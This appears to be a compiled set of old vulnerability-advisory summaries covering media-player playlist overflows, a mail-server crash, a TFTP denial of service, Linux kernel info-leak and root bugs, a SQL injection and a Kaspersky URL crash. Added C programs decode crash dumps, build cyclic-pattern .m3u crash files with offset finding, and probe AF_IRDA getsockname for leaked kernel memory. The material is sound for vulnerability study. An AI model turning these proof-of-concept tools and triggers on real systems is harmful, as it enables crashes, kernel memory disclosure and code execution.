The crash appears when a specially encoded base64 string is sent to the HTTP Mail Server. The faulting instruction dereferences DS:[54516FF1], which the debugger marks as ??? (unreadable), while EDX=48545541. Register state at the crash: EAX 70F8FEFE, ECX 004212B8 (mehttps.004212B8), EDX 48545541, EBX 003B2660, ESP 00BB2900, EBP 00BB2E20 (pointing at ASCII "UATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUAT"). The stack holds: 69736142, 45542063, 55504551, 54515441, 44555045, 45544155, 55504551, 54515441, 44555045, 45544155, 55504551, 54515441, 44555045, 45544155, 55504551, 54515441, 44555045, 45544155, 55504551, 54515441, 44555045, 45544155, 55504551, 54515441, 44555045, 45544155, 55504551, 54515441, 44555045, 45544155, 55504551, 54515441, 44555045, 45544155, 55504551, 54515441, 44555045, 45544155, 55504551, 54515441, 44555045, 45544155, 55504551, 54515441, 44555045, 45544155, 55504551, 54515441, 44555045, 45544155, 55504551, 54515441, 44555045, 45544155, 55504551, 54515441, 44555045, 45544155. Read as little-endian bytes, EDX (48545541) is the ASCII text "AUTH" and the stack words spell "Basic TEQEPUATQTEPUD...", i.e. the request's Authorization header, so the value in EDX comes from request text rather than from a valid pointer.
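The dump above is only useful once the register and stack words are turned back into the bytes they were loaded from. The following is an added example, not code from the original advisory: two small helpers that decode 32-bit little-endian values (the form OllyDbg-style dumps show) into ASCII, applied to the EDX value and the first stack words quoted in the text. The values are copied from the dump; the function names are mine.

```c
/* Added example: decode little-endian dwords from a crash dump into ASCII.
 * Not part of the original advisory; the constants below are copied from
 * the register/stack dump quoted in the text. */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Write the four bytes of a little-endian dword as text into out[5].
 * Non-printable bytes become '.', so genuine pointers stand out from text. */
void dword_to_ascii(uint32_t v, char out[5])
{
    for (int i = 0; i < 4; i++) {
        unsigned char b = (unsigned char)((v >> (8 * i)) & 0xff); /* low byte first */
        out[i] = isprint(b) ? (char)b : '.';
    }
    out[4] = '\0';
}

/* Decode a run of stack words (lowest address first) into one string.
 * Returns the number of characters written (excluding the terminator). */
size_t stack_to_ascii(const uint32_t *words, size_t n, char *out, size_t cap)
{
    size_t len = 0;
    for (size_t i = 0; i < n && len + 4 < cap; i++) {
        dword_to_ascii(words[i], out + len);
        len += 4;
    }
    return len;
}

/* Convenience predicates so the decoding can be checked without buffers. */
int decodes_to(uint32_t v, const char *expected)
{
    char s[5];
    dword_to_ascii(v, s);
    return strcmp(s, expected) == 0;
}

int stack_decodes_to(const uint32_t *words, size_t n, const char *expected)
{
    char s[256];
    stack_to_ascii(words, n, s, sizeof s);
    return strcmp(s, expected) == 0;
}

/* EDX and the first stack words from the dump in the text. */
static const uint32_t crash_edx = 0x48545541;
static const uint32_t crash_stack[] = {
    0x69736142, 0x45542063, 0x55504551, 0x54515441, 0x44555045, 0x45544155,
    0x55504551, 0x54515441, 0x44555045, 0x45544155,
};

int main(void)
{
    char reg[5], buf[256];
    dword_to_ascii(crash_edx, reg);
    printf("EDX = %08X -> \"%s\"\n", crash_edx, reg);
    stack_to_ascii(crash_stack, sizeof crash_stack / sizeof crash_stack[0], buf, sizeof buf);
    printf("stack -> \"%s\"\n", buf);
    return 0;
}
```

Seeing "AUTH" in EDX and "Basic TEQEPU..." on the stack tells you which part of the request reached the faulting code before you spend time on a controlled pattern.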
This exploit targets a buffer overflow vulnerability in Ultimate Player v1.56 beta. It allows an attacker to execute arbitrary code by overflowing a buffer in the application. The overflow is triggered when a specially crafted .m3u or .upl file is opened by the application.
This exploit sends a malicious payload to the TFTP Server Service, which makes the service stop; it has to be started again manually from its Config interface. It was tested on Windows XP SP3.
A buffer overflow vulnerability exists in Swift Ultralite 1.032 when a specially crafted .M3U file is opened. The vulnerability is caused by a boundary error when handling the file: an overly long entry in the playlist is copied into a fixed-size stack buffer, causing a stack-based buffer overflow. This can be exploited to execute arbitrary code by tricking a user into opening a malicious .M3U file.
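Both of the playlist overflows above (Ultimate Player and Swift Ultralite) follow the same PoC pattern: write a file whose single entry is far longer than the target's stack buffer, open it, and read the crashed registers. The following is an added example, not either advisory's PoC: it writes a Metasploit-style cyclic pattern into a playlist file and, given a dword read from a crashed register such as EIP, recovers the byte offset of that value in the pattern. The output file name and length are assumptions for illustration.

```c
/* Added example: cyclic-pattern playlist generator and offset finder.
 * Not the PoC code of the advisories above; file name/length are assumed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PATTERN_MAX 20280   /* 26 * 26 * 10 triplets * 3 bytes: unique positions */

/* Fill buf with up to len bytes of the pattern_create-style sequence
 * Aa0Aa1Aa2...: every 4-byte window is unique within PATTERN_MAX bytes. */
size_t cyclic_pattern(char *buf, size_t len)
{
    size_t n = 0;
    for (char u = 'A'; u <= 'Z' && n < len; u++)
        for (char l = 'a'; l <= 'z' && n < len; l++)
            for (char d = '0'; d <= '9' && n < len; d++) {
                char trip[3] = { u, l, d };
                for (int i = 0; i < 3 && n < len; i++)
                    buf[n++] = trip[i];
            }
    return n;
}

/* Given a 32-bit value read from a register in the debugger, return the
 * byte offset at which those four bytes sit in a pattern of `len` bytes,
 * or -1 if they are not in it.  x86 is little-endian, so the register's
 * low byte is the first byte that landed in memory. */
long pattern_offset(uint32_t reg, size_t len)
{
    static char pat[PATTERN_MAX];
    unsigned char needle[4];
    if (len > sizeof pat)
        len = sizeof pat;
    size_t n = cyclic_pattern(pat, len);
    for (int i = 0; i < 4; i++)
        needle[i] = (unsigned char)((reg >> (8 * i)) & 0xff);
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Write a playlist whose only entry is `len` bytes of pattern.
 * Returns the number of pattern bytes written, or -1 on error. */
long write_playlist(const char *path, size_t len)
{
    static char pat[PATTERN_MAX];
    if (len > sizeof pat)
        len = sizeof pat;
    size_t n = cyclic_pattern(pat, len);
    FILE *f = fopen(path, "wb");
    if (!f)
        return -1;
    int ok = fwrite(pat, 1, n, f) == n && fputc('\n', f) != EOF;
    fclose(f);
    return ok ? (long)n : -1;
}

int main(void)
{
    /* Assumed file name and length; adjust to the target's buffer size. */
    long written = write_playlist("crash.m3u", 5000);
    printf("wrote %ld pattern bytes to crash.m3u\n", written);
    /* After the crash, feed the EIP value shown by the debugger here. */
    printf("offset of 0x61413161: %ld\n", pattern_offset(0x61413161, 5000));
    return 0;
}
```

Once the offset is known, the file is regenerated with the bytes at that position replaced by the return address of choice; a plain run of 'A's (as in the uTorrent PoC below) proves the crash but does not tell you where in the input the overwritten return address came from.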
The Linux kernel before 2.6.31-rc7 does not initialize certain data structures within its getname functions (the handlers behind getsockname and getpeername), so the uninitialized bytes are copied to user space along with the address. This allows local users to read the contents of some kernel memory locations by calling getsockname on an AF_IRDA socket.
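The leak is visible from user space without any special tooling: poison a buffer, call getsockname on an AF_IRDA socket, and look at what the kernel wrote beyond the fields an unbound socket can legitimately fill. The following is an added example, not code from the kernel advisory: a probe that does exactly that, plus a helper that counts the suspicious bytes. The IrDA struct layout assumed here (2-byte family, 1-byte LSAP selector, 4-byte address, 25-byte name) is that of sockaddr_irda; the poison value, the three-byte skip and the constructed sample are assumptions.

```c
/* Added example: probe getsockname() on an AF_IRDA socket for leaked bytes.
 * Not from the original advisory.  AF_IRDA is defined locally because modern
 * Linux headers no longer ship IrDA; on such kernels socket() simply fails
 * and the probe reports the family as unsupported. */
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#ifndef AF_IRDA
#define AF_IRDA 23          /* Linux address-family number for IrDA */
#endif

/* Count bytes in buf[skip..len) that are neither zero nor the poison value.
 * For an unbound socket the address and name fields of a zero-initialised
 * struct are all zero, so anything else the kernel wrote past the family
 * and LSAP fields is uninitialised kernel memory. */
size_t unexpected_bytes(const unsigned char *buf, size_t len, size_t skip,
                        unsigned char poison)
{
    size_t count = 0;
    for (size_t i = skip; i < len; i++)
        if (buf[i] != 0 && buf[i] != poison)
            count++;
    return count;
}

/* Fill buf with poison, call getsockname on a fresh AF_IRDA socket and
 * return the length the kernel reported; 0 if AF_IRDA is unavailable,
 * -1 if getsockname itself failed. */
int probe_irda_getsockname(unsigned char *buf, size_t cap, unsigned char poison)
{
    int fd = socket(AF_IRDA, SOCK_STREAM, 0);
    if (fd < 0)
        return 0;               /* no IrDA support: nothing to probe */
    memset(buf, poison, cap);
    socklen_t len = (socklen_t)cap;
    int rc = getsockname(fd, (struct sockaddr *)buf, &len);
    close(fd);
    return rc < 0 ? -1 : (int)len;
}

/* Constructed sample (not captured from a real kernel) of what a leaking
 * getsockname() could return: family 23, LSAP 0, address 0, empty name,
 * then three stray bytes of stack garbage before the zeros resume. */
size_t constructed_sample_count(void)
{
    unsigned char sample[36];
    memset(sample, 0, sizeof sample);
    sample[0] = 23;                         /* sir_family = AF_IRDA */
    sample[12] = 0xC0; sample[13] = 0xFF; sample[14] = 0xEE;   /* "leaked" */
    return unexpected_bytes(sample, sizeof sample, 3, 0xAA);
}

int main(void)
{
    unsigned char buf[64];
    int len = probe_irda_getsockname(buf, sizeof buf, 0xAA);
    if (len <= 0) {
        printf("AF_IRDA not usable here (rc=%d, errno=%d)\n", len, errno);
    } else {
        printf("kernel wrote %d bytes:", len);
        for (int i = 0; i < len; i++)
            printf(" %02x", buf[i]);
        printf("\nunexpected bytes past family/LSAP: %zu\n",
               unexpected_bytes(buf, (size_t)len, 3, 0xAA));
    }
    printf("constructed sample: %zu unexpected bytes\n", constructed_sample_count());
    return 0;
}
```

Bytes still equal to the poison value were never touched by the kernel; zero bytes are what a properly initialised struct produces; anything else in the tail is the leak. Repeating the call a few times and watching those bytes change is the quickest confirmation.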
This is a local ring0 root exploit for 32-bit Linux kernel 2.6 before 2.6.19. It was tested on White Box 4 (2.6.9-5.ELsmp), CentOS 4.4 (2.6.9-42.ELsmp), CentOS 4.5 (2.6.9-55.ELsmp), Fedora Core 4 (2.6.11-1.1369_FC4smp), Fedora Core 5 (2.6.15-1.2054_FC5) and Fedora Core 6 (2.6.18-1.2798.fc6). The vulnerability was discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team; the exploit was written by p0c73n1(at)gmail(dot)com.
This exploit is based on a local buffer overflow vulnerability in HTML Creator & Sender version 2.3 Build 697. The overflow is triggered when a maliciously crafted file is opened in the application and can lead to arbitrary code execution in the context of the application's user.
This PoC exploits a buffer overflow vulnerability in uTorrent version 1.8.3 (Build 15772) by creating a malicious file whose name contains a string of 9000 'A' characters. When that file is added to the 'Source' field of the 'Create New Torrent' window, the buffer overflow occurs, potentially allowing an attacker to execute arbitrary code.
A vulnerability in Silurus Classifieds System allows an attacker to inject malicious SQL commands via the 'ID' parameter of the 'category.php' script, which is used in a database query without proper sanitization. This can be exploited to manipulate the query by injecting arbitrary SQL code. Successful exploitation may allow an attacker to gain access to the system and/or disclose sensitive information.
The vulnerability affects Kaspersky Internet Security 2010 9.0.0.459 and its sibling product, Kaspersky Antivirus 2010 9.0.0.463. The issue was discovered on August 18th 2009. The problem in these two versions appears when parsing a URL that contains a large number of consecutive dots: Kaspersky's native avp.exe process drives CPU usage up to 100%. At first, traffic through the browser is blocked, and eventually, if enough consecutive dots are passed inside the URL, the computer crashes. The trigger can be placed inside HTML files as an ordinary href value or as an img source, and it also works inside HTML email bodies. Because it can be delivered remotely, the advisory classifies it as a remote memory corruption / denial of service; the observed effect is CPU exhaustion followed by a crash.